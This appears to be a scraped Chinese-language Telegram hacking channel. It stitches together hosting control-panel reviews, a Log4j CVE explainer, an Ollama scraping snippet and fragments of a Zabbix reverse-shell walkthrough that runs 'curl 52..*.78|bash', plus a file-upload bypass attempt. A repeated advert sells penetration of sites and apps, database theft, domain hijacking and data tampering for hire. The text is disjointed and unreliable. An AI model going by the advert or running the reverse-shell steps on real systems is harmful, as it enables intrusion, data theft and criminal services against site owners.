网站破解权限 渗透劫持 黑客数据
5.01K subscribers
572 photos
1 video
51 links
Download Telegram
在选择适合您的服务器和网站管理需求的面板软件时,1Panel是一个令人瞩目的选择。作为一款比宝塔更好用的面板,1Panel不仅提供丰富的功能,还拥有直观的界面和卓越的性能,让您能够更轻松地管理您的技术环境。
渗透 在线接单中:
渗透各类网站app软件,可做/数据库/权限/破解/更改数据
指定网站app渗透数据可按条 包库 劫持域名 实力靠谱唯一🆔 @YaMaa8
支持系统:Centos7-9、Debian9-11、Ubuntu18/20/22
Web环境:Nginx、Aoache
PHP版本:5.2-8.2
数据库:MySQL5.1/5.5-5.7/8.0、Redis等
扩展功能:文件管理、邮局、Supervisor等
AMH是国内首款开源的主机面板,程序开源透明、纯净、无混淆、无加密。 AMH是国内首个支持弹性多环境面板,软件模块化架构设计,高扩展灵活性。 付费版本和免费版本只是下载软件次数不同,并无太大影响。
支持系统:Centos、Debian、Ubuntu
Web环境:
PHP版本:5.4-8.2
数据库:Mysql5.6/5.7/8.0/8.1、Mariadb10.4-10.5、PostgreSQL、Redis等
扩展功能:Web终端、文件管理、Docker容器扩展
一个开源的面板,基本是基于Docker环境,因此兼容很多Linux系统。以Docke容器扩展,支持多种环境。新发布的面板,发布不足一年,稳定性还需要观察。
hestiacp是一款开源的面板,是vestacp分支,它可以管理服务器网站、邮箱、数据库等服务,功能强大,资源占用少,有用户管理和插件扩展,感觉不太好用。
CloudPanel是一款开源的Web虚拟主机控制面板,支持静态网站、PHP、Node.js和Python等Web配置。一网站一用户,功能比较简洁。
渗透 在线接单中:
渗透各类网站app软件,可做/数据库/权限/破解/更改数据
指定网站app渗透数据可按条 包库 劫持域名 实力靠谱唯一🆔 @YaMaa8
cyberpanel是首个支持LiteSpeed和OpenLiteSpeed的控制面板,LiteSpeed是一个收费的Web服务器,OpenLiteSpeed是它的免费版本。LiteSpeed是Apache轻量级替代方案,基本兼容Apache流行功能。
支持系统:Debian9-12、Ubuntu18/20/22、Centos7、AlmaLinux:8、Rocky8
Web环境:Nginx、Apache
PHP版本:5.2-8.2
数据库:Mysql、mariadb、PostgreSQL、Redis等
扩展功能:Web终端、DNS管理、邮局等
需要注册Fastpanel账号授权。多种功能扩展,可自定义安装。
MyVestaCP是VestaCP分支,该分支只支持Debian,VestaCP支持的系统版本比较低,感觉更新不活跃,可以使用hestiacp或MyVestaCP。HestiaCP基本保留VestaCP的界面,MyVestaCP使用新界面。VestaCP付费插件如文件管理等
在“监测中-->问题”此界面点击一台服务器,随即会弹出一个“脚本”选项卡,点击上面创建的"nc shell"。
渗透 在线接单中:
渗透各类网站app软件,可做/数据库/权限/破解/更改数据
指定网站app渗透数据可按条 包库 劫持域名 实力靠谱唯一🆔 @YaMaa8
这样上面的命令就会被执行。但是,由于选择的这台服务器没有安装nc,导致命令执行不成功。既然没有安装nc,那就给这台服务器安装nc呗!
Linux服务器get shell的方法。既然能够命令执行,那我们是不是可以在一台服务器上开放一个特定的端口,构造好反弹shell的代码,只要有客户端连接此端口,那么客户端的shell就会反弹到我们那台服务器上。
渗透 在线接单中:
渗透各类网站app软件,可做/数据库/权限/破解/更改数据
指定网站app渗透数据可按条 包库 劫持域名 实力靠谱唯一🆔 @YaMaa8
1
在Zabbix服务器上创建一个脚本,用于反弹shell的建立。
在命令里输入“curl 52..*.78|bash”。

执行上面的脚本
渗透 在线接单中:
渗透各类网站app软件,可做/数据库/权限/破解/更改数据
指定网站app渗透数据可按条 包库 劫持域名 实力靠谱唯一🆔 @YaMaa8
Log4j 漏洞 CVE-2021-45105:您需要了解的内容

了解 CVE-2021-45105 漏洞
Lookup 模式接受以下格式:

${lookupName:key:-defaultValue}

lookupName 是要执行的查找的名称或类型(例如 ctx, env等)。
keyctx 是在相应地图对象(如果是 地图) 中查找的变量的名称 ThreadContext 。
defaultValuekey 是一个可选值,它告诉替换器如果在映射中不存在 该查找实例,应该用什么来代替它 。
也许有读者已经知道了这一点:

如果映射中的变量 ThreadContext 受到攻击者控制,则可以使用默认值来保存与查找相同的字符串Context。
ScrapeGraphAI是一个网络爬虫 Python 库,使用大型语言模型和直接图逻辑为网站和本地文档(XML,HTML,JSON 等)创建爬取管道。
安装ollama
点击前往网站 https://ollama.com/ ,下载ollama软件,支持win、Mac、linux
以llama3为例,根据自己电脑显存性能, 选择适宜的版本。如果不知道选什么,那就试着安装,不合适不能用再删除即可。
👍1
在Python中调用本地ollama服务,需要先启动本地ollama服务, 打开电脑命令行cmd(mac是terminal), 执行
👍1
rom scrapegraphai.graphs import SmartScraperGraph


graph_config = {
"llm": {
"model": "ollama/llama3",
"temperature": 0,
"format": "json", # Ollama 需要显式指定格式
"base_url": "http://localhost:11434", # 设置 Ollama URL
},
"embeddings": {
"model": "ollama/nomic-embed-text",
"base_url": "http://localhost:11434", # 设置 Ollama URL
},
"verbose": True,
}

smart_scraper_graph = SmartScraperGraph(
prompt="返回该网站所有文章的标题、日期、文章链接",
# 也接受已下载的 HTML 代码的字符串
#source=requests.get("https://textdata.cn/blog/").text,
source="https://textdata.cn/blog/",
config=graph_config
)

result = smart_scraper_graph.run()
print(result)
1👍1
反弹shell建立成功。
很重要的一点,zabbix的登录口令一定要复杂,不要用默认口令或弱口令;

2、zabbix的server和agent都不要以root启动,不要设置AllowRoot=1;

3、禁止agent执行system.run,不要设置EnableRemoteCommands=1。
2
写入脚本代码。接下来,我把上传报文中的图片数据替换为一行无害的 JSP 代码:
上传失败,文件内容是唯一变更的地方,那么,我可以合理猜测服务端要么检测了文件内容是否存在脚本代码,要么检测了文件头是否为图片类型。

验证是否检测了脚本代码。我把这行 JSP 代码改为普通文本:
1